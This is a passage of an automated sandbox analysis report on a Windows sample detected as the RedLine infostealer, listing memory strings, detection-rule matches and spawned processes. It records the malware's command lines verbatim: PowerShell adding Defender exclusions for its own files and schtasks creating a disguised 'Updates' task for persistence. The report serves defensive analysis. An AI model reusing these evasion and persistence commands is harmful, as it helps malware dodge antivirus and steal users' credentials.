Source: 9nvo2o410p.exe, 00000008.00000002.1808620706.000000000445D000.00000004.00000800.00020000.00000000.sdmp, 9nvo2o410p.exe, 00000008.00000002.1808620706.0000000004404000.00000004.00000800.00020000.00000000.sdmp, FAwLPzxPWWF.exe, 00000010.00000002.1868583936.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, tmp63CF.tmp.16.dr, tmp2F20.tmp.16.dr, tmp2ED0.tmp.16.dr, tmp413D.tmp.8.dr, tmp2EF0.tmp.16.dr, tmp410C.tmp.8.dr, tmp7775.tmp.8.dr, tmp8E54.tmp.16.dr, tmpF9C4.tmp.16.dr, tmp415F.tmp.8.dr, tmpAA9.tmp.8.dr, tmp63BF.tmp.16.dr, tmpA69.tmp.8.dr, tmp414E.tmp.8.dr, tmp639F.tmp.16.dr, tmpF9E4.tmp.16.dr, tmp412D.tmp.8.dr, tmpC42A.tmp.16.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 9nvo2o410p.exe, 9nvo2o410p.exe, 00000008.00000002.1803146897.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 9nvo2o410p.exe, 00000008.00000002.1808620706.000000000445D000.00000004.00000800.00020000.00000000.sdmp, 9nvo2o410p.exe, 00000008.00000002.1808620706.0000000004404000.00000004.00000800.00020000.00000000.sdmp, FAwLPzxPWWF.exe, 00000010.00000002.1868583936.0000000003DF3000.00000004.00000800.00020000.00000000.sdmp, FAwLPzxPWWF.exe, 00000010.00000002.1868583936.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, tmp63CF.tmp.16.dr, tmp2F20.tmp.16.dr, tmp2ED0.tmp.16.dr, tmp413D.tmp.8.dr, tmp2EF0.tmp.16.dr, tmp410C.tmp.8.dr, tmp7775.tmp.8.dr, tmp8E54.tmp.16.dr, tmpF9C4.tmp.16.dr, tmp415F.tmp.8.dr, tmpAA9.tmp.8.dr, tmp63BF.tmp.16.dr, tmpA69.tmp.8.dr, tmp414E.tmp.8.dr, tmp639F.tmp.16.dr, tmpF9E4.tmp.16.dr, tmp412D.tmp.8.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 9nvo2o410p.exe, 00000008.00000002.1808620706.000000000445D000.00000004.00000800.00020000.00000000.sdmp, 9nvo2o410p.exe, 00000008.00000002.1808620706.0000000004404000.00000004.00000800.00020000.00000000.sdmp, FAwLPzxPWWF.exe, 00000010.00000002.1868583936.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, tmp63CF.tmp.16.dr, tmp2F20.tmp.16.dr, tmp2ED0.tmp.16.dr, tmp413D.tmp.8.dr, tmp2EF0.tmp.16.dr, tmp410C.tmp.8.dr, tmp7775.tmp.8.dr, tmp8E54.tmp.16.dr, tmpF9C4.tmp.16.dr, tmp415F.tmp.8.dr, tmpAA9.tmp.8.dr, tmp63BF.tmp.16.dr, tmpA69.tmp.8.dr, tmp414E.tmp.8.dr, tmp639F.tmp.16.dr, tmpF9E4.tmp.16.dr, tmp412D.tmp.8.dr, tmpC42A.tmp.16.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

barindex
Source: 8.2.9nvo2o410p.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 8.2.9nvo2o410p.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9nvo2o410p.exe.4130440.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9nvo2o410p.exe.4130440.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9nvo2o410p.exe.4118620.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9nvo2o410p.exe.4118620.7.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9nvo2o410p.exe.4130440.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9nvo2o410p.exe.4130440.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9nvo2o410p.exe.4118620.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9nvo2o410p.exe.4118620.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.1803146897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 9nvo2o410p.exe PID: 8, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 9nvo2o410p.exe PID: 7436, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0167D55C 0_2_0167D55C
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_04EB2E20 0_2_04EB2E20
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757D550 0_2_0757D550
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757D560 0_2_0757D560
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757C5C8 0_2_0757C5C8
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757C5B7 0_2_0757C5B7
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757ADC8 0_2_0757ADC8
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757ADB8 0_2_0757ADB8
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757CA00 0_2_0757CA00
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_0757A990 0_2_0757A990
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_07572818 0_2_07572818
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 0_2_07572808 0_2_07572808
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_0311E7B0 8_2_0311E7B0
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_0311DC90 8_2_0311DC90
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B09628 8_2_06B09628
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B04468 8_2_06B04468
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B01210 8_2_06B01210
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B03320 8_2_06B03320
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B0DD00 8_2_06B0DD00
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_06B0D108 8_2_06B0D108
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_0752F6B8 8_2_0752F6B8
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_0752F6A8 8_2_0752F6A8
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_0752A098 8_2_0752A098
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_0752A088 8_2_0752A088
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_07526FD8 8_2_07526FD8
Source: C:\Users\user\Desktop\9nvo2o410p.exe Code function: 8_2_07529900 8_2_07529900
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_0132D55C 10_2_0132D55C
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E62B0 10_2_056E62B0
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E6C50 10_2_056E6C50
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E8160 10_2_056E8160
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E8150 10_2_056E8150
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E62A0 10_2_056E62A0
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E6C3F 10_2_056E6C3F
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E69A8 10_2_056E69A8
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_056E69B8 10_2_056E69B8
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 10_2_093527C8 10_2_093527C8
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_0137E7B0 16_2_0137E7B0
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_0137DC90 16_2_0137DC90
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065C4468 16_2_065C4468
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065C9630 16_2_065C9630
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065C1210 16_2_065C1210
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065C32C8 16_2_065C32C8
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065CDD18 16_2_065CDD18
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065CDA24 16_2_065CDA24
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065CF9F0 16_2_065CF9F0
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065CD528 16_2_065CD528
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Code function: 16_2_065CF9E1 16_2_065CF9E1
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.0000000003E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000000.00000002.1671009128.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000000.00000002.1687683742.0000000005A20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000000.00000002.1692381714.00000000077C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000000.00000000.1636943151.0000000000B5C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamejkfw.exeX vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000000.00000002.1665929980.000000000113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000008.00000002.1803146897.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe, 00000008.00000002.1805123324.00000000032F4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe Binary or memory string: OriginalFilenamejkfw.exeX vs 9nvo2o410p.exe
Source: 9nvo2o410p.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.9nvo2o410p.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 8.2.9nvo2o410p.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9nvo2o410p.exe.4130440.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9nvo2o410p.exe.4130440.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9nvo2o410p.exe.4118620.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9nvo2o410p.exe.4118620.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9nvo2o410p.exe.4130440.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9nvo2o410p.exe.4130440.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9nvo2o410p.exe.4118620.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9nvo2o410p.exe.4118620.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.1803146897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 9nvo2o410p.exe PID: 8, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 9nvo2o410p.exe PID: 7436, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 9nvo2o410p.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FAwLPzxPWWF.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.9nvo2o410p.exe.3e70f90.4.raw.unpack, iM.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.9nvo2o410p.exe.3e70f90.4.raw.unpack, iM.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, BEHdFbmZOZtZXLturr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs Security API names: _0020.SetAccessControl
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs Security API names: _0020.AddAccessRule
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs Security API names: _0020.SetAccessControl
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs Security API names: _0020.AddAccessRule
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, BEHdFbmZOZtZXLturr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9nvo2o410p.exe.2e867dc.2.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.9nvo2o410p.exe.2ed7b28.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.9nvo2o410p.exe.2ee81b0.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/103@1/1
Source: C:\Users\user\Desktop\9nvo2o410p.exe File created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Users\user\Desktop\9nvo2o410p.exe File created: C:\Users\user\AppData\Local\Temp\tmp4717.tmp Jump to behavior
Source: 9nvo2o410p.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9nvo2o410p.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\9nvo2o410p.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: tmpD335.tmp.8.dr, tmp8E14.tmp.16.dr, tmpA37.tmp.8.dr, tmpD356.tmp.8.dr, tmpD367.tmp.8.dr, tmp5772.tmp.16.dr, tmp20D1.tmp.16.dr, tmp5792.tmp.16.dr, tmp20A0.tmp.16.dr, tmpA48.tmp.8.dr, tmp20B0.tmp.16.dr, tmpD346.tmp.8.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 9nvo2o410p.exe ReversingLabs: Detection: 70%
Source: 9nvo2o410p.exe Virustotal: Detection: 64%
Source: C:\Users\user\Desktop\9nvo2o410p.exe File read: C:\Users\user\Desktop\9nvo2o410p.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\9nvo2o410p.exe "C:\Users\user\Desktop\9nvo2o410p.exe"
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\9nvo2o410p.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FAwLPzxPWWF" /XML "C:\Users\user\AppData\Local\Temp\tmp4717.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Users\user\Desktop\9nvo2o410p.exe "C:\Users\user\Desktop\9nvo2o410p.exe"
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FAwLPzxPWWF" /XML "C:\Users\user\AppData\Local\Temp\tmp586C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\9nvo2o410p.exe" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FAwLPzxPWWF" /XML "C:\Users\user\AppData\Local\Temp\tmp4717.tmp" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Users\user\Desktop\9nvo2o410p.exe "C:\Users\user\Desktop\9nvo2o410p.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FAwLPzxPWWF" /XML "C:\Users\user\AppData\Local\Temp\tmp586C.tmp"
